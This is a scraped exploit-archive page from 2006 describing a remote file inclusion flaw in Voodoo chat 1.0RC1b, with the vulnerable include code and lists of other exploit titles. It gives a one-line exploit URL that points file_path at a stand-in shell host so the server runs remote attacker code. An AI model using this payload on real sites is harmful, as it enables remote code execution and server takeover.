exploits , vulnerabilities , articles , Voodoo chat <= 1.0RC1b (file_path) Remote File Inclusion Vulnerability

2007-04-13 Chatness <= 2.5.3 (options.php/save.php) Remote Code Execution Exploit
2007-03-17 MPM Chat 2.5 (view.php logi) Local File Include Vulnerability
2007-03-07 Flat Chat 2.0 (include online.txt) Remote Code Execution Vulnerability
2006-09-04 FlashChat <= 4.5.7 (aedating4CMS.php) Remote File Include Vulnerability
2006-08-19 ZZ:FlashChat <= 3.1 (adminlog) Remote File Incude Vulnerability
2006-08-07 XChat <= 2.6.7 (win version) Remote Denial of Service Exploit (perl)

2006-08-02

Voodoo chat <= 1.0RC1b (file_path) Remote File Inclusion Vulnerability

Rated as : High Risk

#=================================================================
#Voodoo chat 1.0RC1b <= (file_path) Remote File Inclusion Exploit
#================================================================
#                                                                |
#Critical Level : Dangerous                                      |
#                                                                |
#Venedor site : http://vochat.com/                               |
#                                                                |
#Version : 1.0                                                   |
#                                                                |
#=================================================================
#Bug in : index.php
#
#Vlu Code :
#--------------------------------
#//here it can fails, i don't care. will be used default system language
#
#   else
include_once($file_path."languages/".$language.".php");
#
#  
include($file_path."designes/".$design."/index.php");
#?>
#=================================================================
#
#Exploit :
#--------------------------------
#
#http://sitename.com/[Script
Path]/index.php?file_path=http://SHELLURL.COM?
#
#===============================================================================
#Discoverd By : SHiKaA
#
#Conatact : SHiKaA-[at]hotmail.com
#
#GreetZ : Bl@Ck^B1rd Semsemmasr Black_Scorpion Medo_Ye7ya Kambaa  NANA
Kashtawa
#Skiing Gendiaaa Saw AzIZa SnIpEr_Sa Masry OSA FEGLA 3amer
=================================================================


securitydot.net - 2006-08-02

Exploits - newest 10 RSS | More

2007-06-15 57357 Hits XOOPS Module Cjay Content 3 Remote File Inclusion Vulnerability
2007-06-15 34260 Hits XOOPS Module XT-Conteudo (spaw_root) RFI Vulnerability
2007-06-15 42498 Hits XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability
2007-06-15 29378 Hits Microsoft Office MSODataSourceControl COM-object BoF PoC (0day)
2007-06-13 19804 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2)
2007-06-13 16740 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4)
2007-06-13 19448 Hits Safari 3 for Windows Beta Remote Command Execution PoC
2007-06-13 16631 Hits Ace-FTP Client 1.24a Remote Buffer Overflow PoC
2007-06-09 33651 Hits MoviePlay 4.76 .lst File Local Buffer Overflow Exploit
2007-06-09 17264 Hits e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit